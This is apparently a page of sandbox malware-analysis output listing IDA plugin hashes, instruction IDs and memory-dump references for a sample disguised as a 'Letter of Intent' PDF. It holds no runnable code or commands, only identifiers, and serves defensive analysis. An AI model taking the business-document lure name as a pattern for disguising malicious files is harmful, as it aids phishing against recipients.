                                                                                      • Instruction ID: 1b21a2131790e86c4754f1acaac6ce93d80aa9090d103e75b20adec82d933e70
                                                                                      • Opcode Fuzzy Hash: 59b3620df9b3d4ce7a3516f21eac8dd4ae698701890757b8f436f0b67fab2a3e
                                                                                      • Instruction Fuzzy Hash: 83F082B0A00248ABDB04DBA9D555E9EB7F4EF49744F540899A611EB2D4EAB4D9008718
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2a43741870f27a30880a908f95195ffe918c7ac70ef0a55a113f8c24779cfc9e
                                                                                      • Instruction ID: dcfd22e837eda64abe26124d9caf5ec5e46e7b861c4e8f49b809d5b1ee191084
                                                                                      • Opcode Fuzzy Hash: 2a43741870f27a30880a908f95195ffe918c7ac70ef0a55a113f8c24779cfc9e
                                                                                      • Instruction Fuzzy Hash: ECF0A7B99217949FF311D799C184B4277DCDB81BB9F0D45E1D4058B502CB78D8C0CE54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 6f2f3c8b41dc73adaa6e70652e93d0dd6b61e91d836278dff38b487431b60237
                                                                                      • Instruction ID: f11999af119a3cdf190efa22ec5b543ad316bf6ea2087a3ad3b01c214aed433f
                                                                                      • Opcode Fuzzy Hash: 6f2f3c8b41dc73adaa6e70652e93d0dd6b61e91d836278dff38b487431b60237
                                                                                      • Instruction Fuzzy Hash: C7F0A7B0A14349EBDB04EBF8D515E6EB3F4EF04704F440898BA02EB2D5EAB4D901C758
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dbdde213aeae542dc6ab0e556bb062d86cb220de3f3556ce2e06e01f5fb62e13
                                                                                      • Instruction ID: 098224824ba6f6a11a7732facf6c8cf10ac3bdb10f638b95c03a849c3adbfead
                                                                                      • Opcode Fuzzy Hash: dbdde213aeae542dc6ab0e556bb062d86cb220de3f3556ce2e06e01f5fb62e13
                                                                                      • Instruction Fuzzy Hash: C2F082B0A1024DABDB04DBE8D915E5EB3F4EF04708F440859BA11EB2D4EAB4E901CB58
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                      • Instruction ID: 8ba3c57372effafe695a1267ac3da2922c2054e4a3e7d2ac3231c6b2900a81e0
                                                                                      • Opcode Fuzzy Hash: 29a6642c7ef7ed3592a36acdccc95c3bae471711bc0d42908ddba4b2807d0017
                                                                                      • Instruction Fuzzy Hash: 8EF0E53351461467C230AA19CC05F5BFBACDBD5B70F14071ABA649B1D0DAB0D901CBE6
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 531ff1343c49cc823bf96769f49cfdef752418444a77a4a879cef77a4fb4871a
                                                                                      • Instruction ID: d36381e7aba77adfa8582d285c9f77393226caf0c7502a7a12be521881c3b732
                                                                                      • Opcode Fuzzy Hash: 531ff1343c49cc823bf96769f49cfdef752418444a77a4a879cef77a4fb4871a
                                                                                      • Instruction Fuzzy Hash: CCF0A7B1A00748EBDB04DBB9C559E9FB7F4EF08704F4404A4F601EB2C0E9B4D9018B18
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: db3f7ab19b4c06bf1b0d13621771edc97b73be567e0ceed9a0354e23b2178da1
                                                                                      • Instruction ID: 65397576410f8e4472f40ade7b565835e333fdb2b9bfd9e712f47fe000f552e2
                                                                                      • Opcode Fuzzy Hash: db3f7ab19b4c06bf1b0d13621771edc97b73be567e0ceed9a0354e23b2178da1
                                                                                      • Instruction Fuzzy Hash: 91F082B0A01248ABDB04DBA9D555E9EB7F4EF08708F540494E601EB384EA74D9018758
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 52467a25b4d11f4fa1f3ea64da1fb332d89f4acae4bdeeb57b3dcdebedb609d3
                                                                                      • Instruction ID: 9505511426a3910aa68572385bff5f0dd14ae1c7ff6b2064ac07b62fcbc2e1cd
                                                                                      • Opcode Fuzzy Hash: 52467a25b4d11f4fa1f3ea64da1fb332d89f4acae4bdeeb57b3dcdebedb609d3
                                                                                      • Instruction Fuzzy Hash: D6F082B0A10648ABDB04DBA9D569F9EB7F4EF08708F540498A601EB284EA74D9008B18
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5e2d645aaac4e71309f457085dc06789f04a7c22ff9bc51d4a9cb4497baadb99
                                                                                      • Instruction ID: d7619ec0ed6a0fe8dc2a4e875abe642a704aa5bc4f4314adc2d1d773610b6ac3
                                                                                      • Opcode Fuzzy Hash: 5e2d645aaac4e71309f457085dc06789f04a7c22ff9bc51d4a9cb4497baadb99
                                                                                      • Instruction Fuzzy Hash: 11F082B1A0024CEBDB04DBA9C559E9EB7F4EF08704F4404A9F601EB281D9B4D9008B58
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: da1d7cd3560e5b4c443df8b10d97563fd4113190625460734c8b5dfb5c920fb1
                                                                                      • Instruction ID: 3a3cdde5b6a3f8b2136aa486f606715a16ece97107d6ab6350542ea035654fc4
                                                                                      • Opcode Fuzzy Hash: da1d7cd3560e5b4c443df8b10d97563fd4113190625460734c8b5dfb5c920fb1
                                                                                      • Instruction Fuzzy Hash: 3EF082B1A00248ABDB04EBA9D559E9EB7F4EF08704F4448A4E601EB280E9B4D9018B18
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                      • Instruction ID: 61f380677d054f911caac6ee0d4d0f319b18a38d35da2f0f608a6472c81c7a38
                                                                                      • Opcode Fuzzy Hash: 09511f6a5b3cabbe784265c74914248b525a176bb6667c193042ebcc910e885d
                                                                                      • Instruction Fuzzy Hash: 26E0E533110725ABD2150A16DD00F12FBA9FF507B0F144D15A65827690CBA4EC11CAD4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                      • Instruction ID: ce8bb1bb05d1d99a6eb6558c3ed783b02ff62ebccfcaad745c4f665db28fd38a
                                                                                      • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                      • Instruction Fuzzy Hash: 79E06DB2210200BFD764CB64DD01FA673ECEB00760F540698B615930E0DAB0AE40CBA0
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fba1a1ac6ad799d61c2ddc326d185083a10fe0a07a476c97b5d34b5c0ba45396
                                                                                      • Instruction ID: d389dea72a9c1766d479a35da49568e192db8d3f7b98a08077f671fe1c3263ed
                                                                                      • Opcode Fuzzy Hash: fba1a1ac6ad799d61c2ddc326d185083a10fe0a07a476c97b5d34b5c0ba45396
                                                                                      • Instruction Fuzzy Hash: 0CF08C71500B508FD724CF18D240B92B3A8EF85724F14CA9CE55A8B691C776D883CB80
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                      • Instruction ID: 3856d17873c979e83067fc5fc9400242276fceceb580e208711c4c20592c480d
                                                                                      • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                      • Instruction Fuzzy Hash: CFE0C231284214BBEB221A40DC00F69BB99DF807E1F104031FB486AA90CAB1ED91DAD4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 982385d8124e80983b9ff483b48b7bf9474319f5c27d9a469ac5fe6d9ef248ce
                                                                                      • Instruction ID: 7ebd579ecf02aaaf270c99f261da8637959e0fb91cdb596ea782f584004eb264
                                                                                      • Opcode Fuzzy Hash: 982385d8124e80983b9ff483b48b7bf9474319f5c27d9a469ac5fe6d9ef248ce
                                                                                      • Instruction Fuzzy Hash: 2EF0E578651B84CFE71ADF04C1E1B5173F9FB85B40F900498D4878FBA1C73AA942CA80
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c545d50f61dea5e671e22edea6ff08ade0f67ffca453c31370c0e8b5fadfe58e
                                                                                      • Instruction ID: 7305622ba4660edba34e966f60fa3625398ffa1ec51787d4b051e5107115da04
                                                                                      • Opcode Fuzzy Hash: c545d50f61dea5e671e22edea6ff08ade0f67ffca453c31370c0e8b5fadfe58e
                                                                                      • Instruction Fuzzy Hash: B0E08632554744AFE3218A49D805F43FBD9DB15370F05C869F55987951C7B9F880CF94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                      • Instruction ID: 136c51dddbe3ccddcda3ce277ba7bcf31a0b69161daad514c39a06b199ef95cf
                                                                                      • Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                                                      • Instruction Fuzzy Hash: A1D05E31161660AFC7325F11EE01F82BBF6AF80F10F450D28B2016A9F48AE1ED85CA94
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                      • Instruction ID: ac1067a9aae7c59bfbe4651f756c293ff7289920b7d22d938ea3ba1b1ffb48d7
                                                                                      • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                      • Instruction Fuzzy Hash: 58D01779941AC48FE317CB04C161B407BF8F705B40F890098E08347AA2C27C9984CB40
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 427ca6eb96b90581979905a4aca713d96a8f2b591aa70216cf78c0d13fec8dd2
                                                                                      • Instruction ID: 38090f6aef60a150a81d83f4959f20cbe3c85fad77fdc8c70e3b7d6eb8b7e476
                                                                                      • Opcode Fuzzy Hash: 427ca6eb96b90581979905a4aca713d96a8f2b591aa70216cf78c0d13fec8dd2
                                                                                      • Instruction Fuzzy Hash: BDC08C32190248BFC7129A91DD01F02BBAAE790BA0F000421BA0446560C572E860DA84
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                                                      • Instruction ID: 87597a6b77994b964b7a88b4a6cb2b58505206cda91d31b000933033d9941d3b
                                                                                      • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                                                      • Instruction Fuzzy Hash: B4C08CB81A1580BEEF0B6701CE10B283690AF0078AFC0099CAF40294A1C3EAE8028718
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 24e2e236a666f9bb1d1a1b83819c978e318f65d854f46dc04eb5f7dcdd2b4c2a
                                                                                      • Instruction ID: fc1986c601cedd7f92af4ee48a60a5c8633346984d063c762816450adda72223
                                                                                      • Opcode Fuzzy Hash: 24e2e236a666f9bb1d1a1b83819c978e318f65d854f46dc04eb5f7dcdd2b4c2a
                                                                                      • Instruction Fuzzy Hash: FBC08C32080248BBC7125A42DD00F01BB6AE7A0BA0F000020BA040A5608572E8A0DA88
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fae17e15df103d916078b63446277b6c5133775b70c9e45a56900ed3f7caece7
                                                                                      • Instruction ID: c8a9d57f3147f6c1f7ae617d89f90e659f56ea70a625e885bb57e4e2987abec3
                                                                                      • Opcode Fuzzy Hash: fae17e15df103d916078b63446277b6c5133775b70c9e45a56900ed3f7caece7
                                                                                      • Instruction Fuzzy Hash: 3DC02B701504C09ADF054B30CCD0F20337CFF00B22FA00B547320864F0C9A89C00D900
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1bcc6d1efd44d3e520fb4e92c13e71c3be2cee1deb4c0e692c50d901a51a2c94
                                                                                      • Instruction ID: acbb0c763cc5b6434d3014ee1b787257d51b50b09e55b1827bf0eb8a89b30f54
                                                                                      • Opcode Fuzzy Hash: 1bcc6d1efd44d3e520fb4e92c13e71c3be2cee1deb4c0e692c50d901a51a2c94
                                                                                      • Instruction Fuzzy Hash: 1390022124140813D1417158D514707000687D0A01F55C412A1034515D86168A6966F2
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      • Instruction Fuzzy Hash: F790026120180413D14175589904607000547D0702F55C412A3074516E8A298D556176
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.2383505236.0000000032F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 32F60000, based on PE: true
                                                                                      • Associated: 00000002.00000002.2383505236.0000000033089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.000000003308D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000002.00000002.2383505236.00000000330FE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_32f60000_Letter of Intent (LOI) For the Company November 2024 PDF.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
